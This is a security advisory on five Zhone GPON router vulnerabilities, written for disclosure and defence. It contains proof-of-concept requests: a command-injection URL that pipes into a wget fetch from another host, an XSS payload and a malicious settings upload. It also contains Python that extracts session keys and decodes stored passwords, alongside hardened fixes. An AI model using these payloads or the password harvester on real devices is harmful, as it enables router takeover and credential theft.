moften

Vantage Point Security Advisory 2015-002

Oct 15th, 2015
Vantage Point Security Advisory 2015-002
========================================

Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg>
<lyon.yang.s[at]gmail[dot]com>

Summary:
--------

1. Insecure Direct Object Reference (CVE-2014-8356)
---------------------------------------------------

The administrative web application does not enforce authorization on the
server side. User access is restricted via JavaScript only, by displaying
the functions available to each user based on their privileges. Low
privileged users of the Zhone router can therefore gain unrestricted access
to administrative functionality, e.g. by modifying the JavaScript responses
returned by the Zhone web server.

Affected URL: http://<Router URL>/menuBcm.js

To demonstrate the issue:

1. Set your browser proxy to Burp Suite.

2. Add the following option to "Match and Replace": match the string
'admin' in responses and replace it with your low privilege username.

3. Log in to the Zhone administrative portal via your browser through the
Burp proxy; you now have full administrative access via the Zhone web
administrative portal.


2. Admin Password Disclosure (CVE-2014-8357)
--------------------------------------------

Any low-privileged user of the ZHONE router web administrative portal can
obtain the passwords of all users stored on the ZHONE web server. The ZHONE
router stores the passwords used to log in to the web administrative portal
with nothing more than Base64 encoding. As these passwords are included in
the settings backup file, which a low-privileged user can download, a
malicious user can obtain all account passwords.

Affected URL: http://<Router URL>/

1. Browse to http://192.168.1.1/backupsettings.html:

2. "View Source" and take note of the sessionKey:

3. Browse to http://<Router URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session Key Here>
and all user account passwords will be returned.

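
The three steps above, written out as an added example (this is not code
from the advisory or from Zhone). The HTML and XML inputs are constructed
stand-ins: the advisory only says the sessionKey is visible in the page
source and that backupsettings.conf is a DslCpeConfig document containing
Base64 password elements, so the script markup, the LoginCfg wrapper, the
Support/User element names, the router address and the sample values are
assumptions. The functions only parse; fetching the two URLs over HTTP is
left out so the example runs offline.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for backupsettings.html. The advisory says the
# sessionKey is visible in the page source; the exact markup is assumed.
SAMPLE_HTML = """<html><head>
<script language="javascript">
var sessionKey = '1853320716';
</script></head><body>Backup Settings</body></html>
"""

# Constructed stand-in for backupsettings.conf. The DslCpeConfig root and
# the AdminPassword element appear in the advisory; the enclosing LoginCfg
# element, the other account elements and every value are assumptions.
SAMPLE_CONF = """<?xml version="1.0"?>
<DslCpeConfig version="3.2">
  <InternetGatewayDevice>
    <LoginCfg>
      <AdminUserName>admin</AdminUserName>
      <AdminPassword>YWRtaW4xMjM=</AdminPassword>
      <SupportUserName>support</SupportUserName>
      <SupportPassword>c3VwcG9ydDIwMTU=</SupportPassword>
      <UserUserName>user</UserUserName>
      <UserPassword>dXNlcjEyMw==</UserPassword>
    </LoginCfg>
  </InternetGatewayDevice>
</DslCpeConfig>
"""

# Assumed shape of the sessionKey assignment in the page's JavaScript.
SESSION_KEY_RE = re.compile(r"sessionKey\s*=\s*['\"]?(\d+)")


def extract_session_key(page_html: str) -> str:
    """Step 2 of the PoC: pull the numeric sessionKey out of the page source."""
    match = SESSION_KEY_RE.search(page_html)
    if match is None:
        raise ValueError("no sessionKey found in backupsettings.html")
    return match.group(1)


def config_url(router: str, session_key: str) -> str:
    """Step 3 of the PoC: the URL that returns the full configuration."""
    return (f"http://{router}/backupsettings.conf"
            f"?action=getConfig&sessionKey={session_key}")


def decode_passwords(conf_xml: str) -> dict:
    """Return {element tag: plaintext} for every *Password element.

    Base64 is an encoding, not encryption: b64decode recovers the stored
    password exactly, with no key involved. Non-printable bytes in the
    result are rendered as \\xNN so they are visible rather than lost.
    """
    root = ET.fromstring(conf_xml)
    passwords = {}
    for elem in root.iter():
        if not elem.tag.endswith("Password") or not elem.text:
            continue
        try:
            raw = base64.b64decode(elem.text.strip(), validate=True)
        except ValueError:
            # Not valid Base64: keep the raw text, marked so it is not
            # mistaken for a recovered plaintext.
            passwords[elem.tag] = "?" + elem.text.strip()
            continue
        text = raw.decode("latin-1")
        passwords[elem.tag] = "".join(
            c if c.isprintable() else f"\\x{ord(c):02x}" for c in text)
    return passwords


def harvest(page_html: str, conf_xml: str, router: str = "192.168.1.1") -> dict:
    """Tie the steps together: session key, config URL, decoded passwords."""
    key = extract_session_key(page_html)
    return {"sessionKey": key,
            "url": config_url(router, key),
            "passwords": decode_passwords(conf_xml)}


if __name__ == "__main__":
    result = harvest(SAMPLE_HTML, SAMPLE_CONF)
    print("sessionKey:", result["sessionKey"])
    print("fetch:", result["url"])
    for tag, password in result["passwords"].items():
        print(f"{tag}: {password}")
```

Running decode_passwords over the AdminPassword value shown in the
advisory's sample upload request (dnFmMUJyM3oB) yields eight printable
characters followed by a single 0x01 byte, which is why the helper escapes
non-printable bytes instead of silently dropping them.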
3. Remote Command Injection (CVE-2014-9118)
-------------------------------------------

Remote command injection in the ZHONE router web administrative console.

Any user of the ZHONE router can inject shell commands through the web
administrative console and execute arbitrary commands on the host
operating system.

Affected URL:

/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3

Affected Parameter:

ipAddr

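
The vulnerable pattern beside its hardened form, as an added example (not
the firmware's code, which the advisory does not show). The request URL is
the advisory's own PoC; the assumption is that the CGI splices the ipAddr
value into a traceroute command line handed to /bin/sh, which is what the
pipe-to-wget payload implies. The traceroute flags (-m, -w, -q) and the
numeric ranges in the hardened version are illustrative choices.

```python
import ipaddress
import shlex
from urllib.parse import parse_qs, urlsplit

# The request from the advisory, URL-encoded exactly as shown there.
POC_URL = ("/zhnping.cmd?&test=traceroute&sessionKey=985703201"
           "&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here"
           "&ttl=30&wait=3&queries=3")


def parse_params(url: str) -> dict:
    """Query string -> {name: first value}, URL-decoded."""
    return {k: v[0] for k, v in
            parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def vulnerable_cmdline(p: dict) -> str:
    """Assumed shape of the bug: parameters spliced into one command
    string that is then handed to /bin/sh (e.g. via system())."""
    return (f"traceroute -m {p['ttl']} -w {p['wait']} -q {p['queries']} "
            f"{p['ipAddr']}")


def shell_tokens(cmdline: str) -> list:
    """Tokenise the way a POSIX shell would: | ; & ( ) become their own
    tokens, so the pipe ends the traceroute command and starts wget."""
    return list(shlex.shlex(cmdline, punctuation_chars=True))


def hardened_argv(p: dict) -> list:
    """Validate every field against its type, then build an argv list for
    execve-style execution (subprocess.run(argv), never shell=True)."""
    try:
        target = ipaddress.ip_address(p.get("ipAddr", ""))
    except ValueError:
        # Any metacharacter makes the value fail to parse as an address.
        raise ValueError(f"ipAddr is not an IP address: {p.get('ipAddr')!r}")
    numeric = {}
    for name, lo, hi in (("ttl", 1, 255), ("wait", 1, 60), ("queries", 1, 10)):
        try:
            value = int(p.get(name, ""))
        except ValueError:
            raise ValueError(f"{name} must be an integer")
        if not lo <= value <= hi:
            raise ValueError(f"{name}={value} outside {lo}..{hi}")
        numeric[name] = value
    return ["traceroute", "-m", str(numeric["ttl"]), "-w", str(numeric["wait"]),
            "-q", str(numeric["queries"]), str(target)]


if __name__ == "__main__":
    params = parse_params(POC_URL)
    print("shell sees:", shell_tokens(vulnerable_cmdline(params)))
    try:
        hardened_argv(params)
    except ValueError as err:
        print("hardened rejects:", err)
    print("hardened would exec:", hardened_argv(dict(params, ipAddr="192.168.1.1")))
```

The argv form is the real fix; the ipaddress check on top of it is
defence in depth, and it also accepts IPv6 targets, which a hand-written
dotted-quad regex would not.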
4. Stored Cross-Site Scripting
------------------------------

The zhnsystemconfig.cgi script is vulnerable to a stored cross-site
scripting attack.

Sample HTTP Request:

GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA-Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com%3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive

Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact

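
An added example (not the CGI's code, which the advisory does not show)
that decodes the request above, renders the stored values the unsafe way
and the entity-encoded way, and applies an input check. The table markup
is assumed. The input check follows RFC 1213, which defines sysName,
sysContact and sysLocation as DisplayString (0..255 octets of printable
ASCII); the point of including it is that a spec-conformant allowlist
lets this payload straight through, so the fix has to be at the output.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The request target from the advisory, before URL decoding.
POC_QUERY = ("/zhnsystemconfig.cgi?snmpSysName=ZNID24xxA-Route"
             "&snmpSysContact=Zhone%20Global%20Support"
             "&snmpSysLocation=www.zhone.com%3Cscript%3Ealert(1)%3C/script%3E"
             "&sessionKey=1853320716")

SNMP_FIELDS = ("snmpSysName", "snmpSysContact", "snmpSysLocation")

# RFC 1213 DisplayString: 0..255 octets of printable (NVT) ASCII.
DISPLAY_STRING_RE = re.compile(r"[\x20-\x7e]{0,255}")


def submitted_fields(url: str) -> dict:
    """The three affected parameters, URL-decoded (missing ones -> '')."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: q.get(name, [""])[0] for name in SNMP_FIELDS}


def render_vulnerable(fields: dict) -> str:
    """Stored value echoed straight into the settings page markup."""
    return "".join(f"<tr><td>{name}</td><td>{value}</td></tr>\n"
                   for name, value in fields.items())


def render_hardened(fields: dict) -> str:
    """Same page, with HTML entity encoding at the point of output."""
    return "".join(
        f"<tr><td>{html.escape(name)}</td><td>{html.escape(value, quote=True)}</td></tr>\n"
        for name, value in fields.items())


def validate_on_store(fields: dict) -> dict:
    """Input-side check: accept only DisplayString-shaped values.

    This keeps oversized or non-ASCII junk out of the configuration (and
    out of SNMP responses, which get no HTML escaping at all), but
    '<script>' is printable ASCII and passes; output encoding is still
    mandatory."""
    bad = {n: v for n, v in fields.items() if not DISPLAY_STRING_RE.fullmatch(v)}
    if bad:
        raise ValueError(f"invalid DisplayString in {sorted(bad)}")
    return fields


if __name__ == "__main__":
    fields = validate_on_store(submitted_fields(POC_QUERY))
    print("unsafe:\n" + render_vulnerable(fields))
    print("escaped:\n" + render_hardened(fields))
```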
5. Privilege Escalation via Direct Object Reference to Upload Settings
Functionality
----------------------------------------------------------------------

A low-privileged user can modify the router settings via the
/uploadsettings.cgi page. With this functionality, a malicious user is able
to replace the admin and support passwords, hence gaining full
administrative access to the Zhone router.

Sample POST Request:

POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438

-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf"
Content-Type: config/conf

<?xml version="1.0"?>
<DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>

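
Issues 1 and 5 share one root cause: the server trusts the menu that
menuBcm.js chose to draw rather than deciding for itself who may call
each CGI. The following is an added example of the server-side check that
was missing; it is not Zhone's code and is not the fix shipped in
S3.1.241. The endpoint names are those from this advisory; the role
table, the endpoint-to-role policy, the LoginCfg element names and the
constructed current configuration are assumptions, and password
verification is left out because only the identity decision is being
shown.

```python
import base64
import xml.etree.ElementTree as ET

# Accounts named in the advisory (admin, support, a low-privileged user).
# Mapping them to roles this way is an assumption for the example.
ROLE_OF_USER = {"admin": "admin", "support": "support", "user": "user"}

# Default-deny policy keyed on the CGI path: an endpoint absent from the
# table is refused for everyone. What menuBcm.js shows or hides plays no
# part in this decision.
ENDPOINT_ROLES = {
    "/uploadsettings.cgi": {"admin", "support"},
    "/backupsettings.conf": {"admin"},
    "/zhnsystemconfig.cgi": {"admin", "support"},
    "/zhnping.cmd": {"admin", "support", "user"},
}

# DslCpeConfig elements only an administrator may change, even when the
# caller is otherwise allowed to upload settings (assumed element names).
CREDENTIAL_TAGS = {"AdminUserName", "AdminPassword",
                   "SupportUserName", "SupportPassword",
                   "UserUserName", "UserPassword"}

# Constructed current configuration; only DslCpeConfig and AdminPassword
# appear in the advisory, the rest is assumed.
CURRENT_CONF = """<?xml version="1.0"?>
<DslCpeConfig version="3.2">
  <LoginCfg>
    <AdminPassword>YWRtaW4xMjM=</AdminPassword>
    <SupportPassword>c3VwcG9ydDIwMTU=</SupportPassword>
  </LoginCfg>
  <SNMP><snmpSysName>ZNID24xxA-Route</snmpSysName></SNMP>
</DslCpeConfig>
"""


def basic_auth_header(user: str, password: str) -> str:
    """Build the Authorization header value a browser would send."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def user_from_basic_auth(header: str):
    """Username from an Authorization: Basic header, or None if malformed."""
    scheme, _, encoded = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        creds = base64.b64decode(encoded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, _password = creds.partition(":")
    return user if sep else None


def authorize(auth_header: str, path: str):
    """(status, detail): 401 unknown caller, 403 role not allowed, 200 user."""
    user = user_from_basic_auth(auth_header)
    if user is None or user not in ROLE_OF_USER:
        return 401, "authentication required"
    if ROLE_OF_USER[user] not in ENDPOINT_ROLES.get(path, set()):
        return 403, f"{user} may not call {path}"
    return 200, user


def credential_elements(conf_xml: str) -> dict:
    """The credential-bearing elements of a DslCpeConfig document."""
    root = ET.fromstring(conf_xml)
    return {e.tag: (e.text or "") for e in root.iter() if e.tag in CREDENTIAL_TAGS}


def handle_upload(auth_header: str, uploaded_conf: str,
                  current_conf: str = CURRENT_CONF):
    """Server-side handler for /uploadsettings.cgi: endpoint check first,
    then a field-level check so non-admins cannot rewrite credentials."""
    status, detail = authorize(auth_header, "/uploadsettings.cgi")
    if status != 200:
        return status, detail
    user = detail
    try:
        creds_changed = credential_elements(uploaded_conf) != credential_elements(current_conf)
    except ET.ParseError:
        return 400, "malformed configuration"
    if creds_changed and ROLE_OF_USER[user] != "admin":
        return 403, f"{user} may not change account credentials"
    return 200, "settings accepted"


if __name__ == "__main__":
    low = basic_auth_header("user", "user123")
    patched = CURRENT_CONF.replace("YWRtaW4xMjM=", "cHduZWQ=")  # AdminPassword -> "pwned"
    print(authorize(low, "/backupsettings.conf"))
    print(handle_upload(low, patched))
    print(handle_upload(basic_auth_header("admin", "admin123"), patched))
```

The two checks answer the two findings separately: the endpoint policy is
what issue 1 lacked, and the credential diff is what would have stopped the
issue 5 upload even from an account that is allowed to restore settings.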
Fix Information:
----------------

Upgrade to version S3.1.241


Timeline:
---------

2014/10: Issues No. 1 & 2 reported to Zhone
2014/12: Issues No. 1 & 3 reported to Zhone
2015/01: Requested update
2015/01: Fixes provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent PoC video showing how the vulnerabilities work
2015/03: Fixes provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested update
2015/04: Issues No. 4 & 5 reported to Zhone
2015/06: Requested update
2015/08: Requested update
2015/09: Fixes for issues 1, 4 and 5 completed by Zhone
2015/10: Confirmed that all issues have been fixed


About Vantage Point Security:
----------------------------

Vantage Point is the leading provider of penetration testing and security
advisory services in Singapore. Clients in the financial, banking and
telecommunications industries select Vantage Point Security based on
technical competency and a proven track record of delivering significant
and measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg